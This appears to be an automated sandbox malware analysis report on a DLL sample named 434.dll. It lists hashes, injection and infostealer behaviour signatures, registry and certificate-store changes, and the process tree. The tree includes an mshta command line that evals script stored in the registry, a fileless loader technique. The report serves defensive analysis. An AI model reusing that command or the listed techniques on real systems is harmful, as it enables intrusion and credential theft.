Analysis
-
max time kernel
151s -
max time network
135s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
13-07-2020 16:54
Static task
static1
Behavioral task
behavioral1
Sample
434.dll
Resource
win7v200430
General
-
Target
434.dll
-
Size
367KB
-
MD5
7e9c8822be0f73073ce2cc5ef5a13c96
-
SHA1
10b2f8667db53eaf1b85a209d9b80b834425167f
-
SHA256
bd6840cc208517847e130db0c847e715ba80a88e210e6383b37c1d0381877ee5
-
SHA512
120bfec74eed70dc19d7aff9ed8dc392616a6c652f4c7b3f642219c6d5203038e66cef65e67b79041b8653b65021e2402b3cfc0f3b6850afd1d13e2a03637118
Malware Config
Signatures
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 1072 powershell.exe 1300 Explorer.EXE 1300 Explorer.EXE 1784 cmd.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 3 api.ipify.org -
Suspicious use of WriteProcessMemory 86 IoCs
Processes:
rundll32.exerundll32.exesvchost.exeiexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEdescription pid process target process PID 1100 wrote to memory of 1048 1100 rundll32.exe rundll32.exe PID 1100 wrote to memory of 1048 1100 rundll32.exe rundll32.exe PID 1100 wrote to memory of 1048 1100 rundll32.exe rundll32.exe PID 1100 wrote to memory of 1048 1100 rundll32.exe rundll32.exe PID 1100 wrote to memory of 1048 1100 rundll32.exe rundll32.exe PID 1100 wrote to memory of 1048 1100 rundll32.exe rundll32.exe PID 1100 wrote to memory of 1048 1100 rundll32.exe rundll32.exe PID 1048 wrote to memory of 596 1048 rundll32.exe svchost.exe PID 1048 wrote to memory of 596 1048 rundll32.exe svchost.exe PID 1048 wrote to memory of 596 1048 rundll32.exe svchost.exe PID 1048 wrote to memory of 596 1048 rundll32.exe svchost.exe PID 1048 wrote to memory of 596 1048 rundll32.exe svchost.exe PID 1048 wrote to memory of 596 1048 rundll32.exe svchost.exe PID 596 wrote to memory of 1500 596 svchost.exe cmd.exe PID 596 wrote to memory of 1500 596 svchost.exe cmd.exe PID 596 wrote to memory of 1500 596 svchost.exe cmd.exe PID 596 wrote to memory of 1500 596 svchost.exe cmd.exe PID 596 wrote to memory of 1332 596 svchost.exe svchost.exe PID 596 wrote to memory of 1332 596 svchost.exe svchost.exe PID 596 wrote to memory of 1332 596 svchost.exe svchost.exe PID 596 wrote to memory of 1332 596 svchost.exe svchost.exe PID 596 wrote to memory of 1332 596 svchost.exe svchost.exe PID 596 wrote to memory of 1332 596 svchost.exe svchost.exe PID 596 wrote to memory of 1808 596 svchost.exe BNAC5B.tmp PID 596 wrote to memory of 1808 596 svchost.exe BNAC5B.tmp PID 596 wrote to memory of 1808 596 svchost.exe BNAC5B.tmp PID 596 wrote to memory of 1808 596 svchost.exe BNAC5B.tmp PID 1560 wrote to memory of 1876 1560 iexplore.exe IEXPLORE.EXE PID 1560 wrote to memory of 1876 1560 iexplore.exe IEXPLORE.EXE PID 1560 wrote to memory of 1876 1560 iexplore.exe IEXPLORE.EXE PID 1560 wrote to memory of 1876 1560 iexplore.exe IEXPLORE.EXE PID 1560 wrote to memory of 2040 1560 iexplore.exe IEXPLORE.EXE PID 1560 wrote to memory of 2040 1560 iexplore.exe IEXPLORE.EXE PID 1560 wrote to memory of 2040 1560 iexplore.exe IEXPLORE.EXE PID 1560 wrote to memory of 2040 1560 iexplore.exe IEXPLORE.EXE PID 1924 wrote to memory of 1072 1924 mshta.exe powershell.exe PID 1924 wrote to memory of 1072 1924 mshta.exe powershell.exe PID 1924 wrote to memory of 1072 1924 mshta.exe powershell.exe PID 1072 wrote to memory of 1720 1072 powershell.exe csc.exe PID 1072 wrote to memory of 1720 1072 powershell.exe csc.exe PID 1072 wrote to memory of 1720 1072 powershell.exe csc.exe PID 1720 wrote to memory of 272 1720 csc.exe cvtres.exe PID 1720 wrote to memory of 272 1720 csc.exe cvtres.exe PID 1720 wrote to memory of 272 1720 csc.exe cvtres.exe PID 1072 wrote to memory of 1780 1072 powershell.exe csc.exe PID 1072 wrote to memory of 1780 1072 powershell.exe csc.exe PID 1072 wrote to memory of 1780 1072 powershell.exe csc.exe PID 1780 wrote to memory of 1100 1780 csc.exe cvtres.exe PID 1780 wrote to memory of 1100 1780 csc.exe cvtres.exe PID 1780 wrote to memory of 1100 1780 csc.exe cvtres.exe PID 1072 wrote to memory of 1300 1072 powershell.exe Explorer.EXE PID 1072 wrote to memory of 1300 1072 powershell.exe Explorer.EXE PID 1072 wrote to memory of 1300 1072 powershell.exe Explorer.EXE PID 1300 wrote to memory of 1560 1300 Explorer.EXE iexplore.exe PID 1300 wrote to memory of 1560 1300 Explorer.EXE iexplore.exe PID 1300 wrote to memory of 1560 1300 Explorer.EXE iexplore.exe PID 1300 wrote to memory of 1784 1300 Explorer.EXE cmd.exe PID 1300 wrote to memory of 1784 1300 Explorer.EXE cmd.exe PID 1300 wrote to memory of 1784 1300 Explorer.EXE cmd.exe PID 1300 wrote to memory of 1784 1300 Explorer.EXE cmd.exe PID 1300 wrote to memory of 1956 1300 Explorer.EXE cmd.exe PID 1300 wrote to memory of 1956 1300 Explorer.EXE cmd.exe PID 1300 wrote to memory of 1956 1300 Explorer.EXE cmd.exe PID 1300 wrote to memory of 1940 1300 Explorer.EXE cmd.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
rundll32.exesvchost.exepowershell.exeExplorer.EXEcmd.exedescription pid process target process PID 1048 set thread context of 596 1048 rundll32.exe svchost.exe PID 596 set thread context of 1332 596 svchost.exe svchost.exe PID 1072 set thread context of 1300 1072 powershell.exe Explorer.EXE PID 1300 set thread context of 1560 1300 Explorer.EXE iexplore.exe PID 1300 set thread context of 1784 1300 Explorer.EXE cmd.exe PID 1784 set thread context of 812 1784 cmd.exe PING.EXE -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
iexplore.exeExplorer.EXEpid process 1560 iexplore.exe 1560 iexplore.exe 1560 iexplore.exe 1300 Explorer.EXE 1300 Explorer.EXE 1300 Explorer.EXE 1300 Explorer.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 812 PING.EXE -
Checks for installed software on the system 1 TTPs 10 IoCs
Processes:
svchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}\DisplayName svchost.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName svchost.exe -
Checks whether UAC is enabled 3 IoCs
Processes:
IEXPLORE.EXEiexplore.exeIEXPLORE.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE -
Processes:
iexplore.exemshta.exeIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007cf8d5bd09b0364592b95b96ab3123880000000002000000000010660000000100002000000048e448d609b76479e828c49adfd75b824ffdcc467474227a1dd58d36a7acbfe4000000000e800000000200002000000041549bbb50110853900ca5f3cd121ac06908985fb6735e94ae607742da57236f20000000451855499b8a9814b08c42b6b17c52aa00b46a743a6375a0de51af8856800c7640000000881f1a83937140102adad5884ffd5f57c676f81b28b5e8932cd7b7232d9808fbf30bef8425bcbdba66d50c4d9946bfec17698f7a5a23876255ea15f318d11219 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007cf8d5bd09b0364592b95b96ab3123880000000002000000000010660000000100002000000098aac470b34b3fa75bbf961bbe0791bab84fe834111151ad4ee6208a0fe31d67000000000e8000000002000020000000b765a0c0be905b9c63c06230b690ce3172a25dea4b0ccb470b8b4b35db7887fa900000000087fdd03baf93638b927d0d7e12be4b0414107df8078498da75203ebaa812774f84662e25cfe5a136716c8452f56716ad848ee04549faa6160d94e489d99a33da7920fe54aabefd33e4a3dd546ebe8c7a35ca31edfb882630b0e6c315bc7e4e39ef390618968d51fdd5d0ddabbde6292f0a7c5ac005c69a92968bba765c636d4fbbd10cd244daed35e9f6f1e2ab7f9d4000000081b8d7a1f042e274771ca7326445311984bd8fe7348a1ea676414f4369c4609c701f269472b000076eee1e1495948a409ee827606329ee2eb4b68725afd6700e iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "301431443" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{46AAA911-C53A-11EA-B9E9-F2AC6545C123} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90890a0e4759d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
svchost.exepowershell.exeExplorer.EXEpid process 596 svchost.exe 596 svchost.exe 1072 powershell.exe 1072 powershell.exe 1300 Explorer.EXE 596 svchost.exe 596 svchost.exe -
Suspicious use of AdjustPrivilegeToken 33 IoCs
Processes:
svchost.exepowershell.exedescription pid process Token: SeImpersonatePrivilege 596 svchost.exe Token: SeTcbPrivilege 596 svchost.exe Token: SeChangeNotifyPrivilege 596 svchost.exe Token: SeCreateTokenPrivilege 596 svchost.exe Token: SeBackupPrivilege 596 svchost.exe Token: SeRestorePrivilege 596 svchost.exe Token: SeIncreaseQuotaPrivilege 596 svchost.exe Token: SeAssignPrimaryTokenPrivilege 596 svchost.exe Token: SeImpersonatePrivilege 596 svchost.exe Token: SeTcbPrivilege 596 svchost.exe Token: SeChangeNotifyPrivilege 596 svchost.exe Token: SeCreateTokenPrivilege 596 svchost.exe Token: SeBackupPrivilege 596 svchost.exe Token: SeRestorePrivilege 596 svchost.exe Token: SeIncreaseQuotaPrivilege 596 svchost.exe Token: SeAssignPrimaryTokenPrivilege 596 svchost.exe Token: SeImpersonatePrivilege 596 svchost.exe Token: SeTcbPrivilege 596 svchost.exe Token: SeChangeNotifyPrivilege 596 svchost.exe Token: SeCreateTokenPrivilege 596 svchost.exe Token: SeBackupPrivilege 596 svchost.exe Token: SeRestorePrivilege 596 svchost.exe Token: SeIncreaseQuotaPrivilege 596 svchost.exe Token: SeAssignPrimaryTokenPrivilege 596 svchost.exe Token: SeImpersonatePrivilege 596 svchost.exe Token: SeTcbPrivilege 596 svchost.exe Token: SeChangeNotifyPrivilege 596 svchost.exe Token: SeCreateTokenPrivilege 596 svchost.exe Token: SeBackupPrivilege 596 svchost.exe Token: SeRestorePrivilege 596 svchost.exe Token: SeIncreaseQuotaPrivilege 596 svchost.exe Token: SeAssignPrimaryTokenPrivilege 596 svchost.exe Token: SeDebugPrivilege 1072 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
svchost.exepid process 596 svchost.exe 596 svchost.exe -
Executes dropped EXE 1 IoCs
Processes:
BNAC5B.tmppid process 1808 BNAC5B.tmp -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEpid process 1560 iexplore.exe 1560 iexplore.exe 1876 IEXPLORE.EXE 1876 IEXPLORE.EXE 1560 iexplore.exe 1560 iexplore.exe 2040 IEXPLORE.EXE 2040 IEXPLORE.EXE 1560 iexplore.exe 1560 iexplore.exe 1876 IEXPLORE.EXE 1876 IEXPLORE.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1300 Explorer.EXE 1300 Explorer.EXE 1300 Explorer.EXE 1300 Explorer.EXE -
Processes:
svchost.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 svchost.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 svchost.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 svchost.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 svchost.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
PID:1300 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\434.dll,#12⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\434.dll,#13⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
PID:1048 -
C:\Windows\SysWOW64\svchost.exeC:\Windows\System32\svchost.exe4⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Checks for installed software on the system
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Loads dropped DLL
- Modifies system certificate store
PID:596 -
C:\Windows\SysWOW64\cmd.execmd /K5⤵PID:1500
-
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\System32\svchost.exe5⤵PID:1332
-
-
C:\Users\Admin\AppData\Local\Temp\BNAC5B.tmpC:\Users\Admin\AppData\Local\Temp\BNAC5B.tmp5⤵
- Executes dropped EXE
PID:1808
-
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\136B3805-56F5-BDAC-F8F7-EA41AC1BBE05\\\Efsltprf'));if(!window.flag)close()</script>"2⤵
- Suspicious use of WriteProcessMemory
- Modifies Internet Explorer settings
PID:1924 -
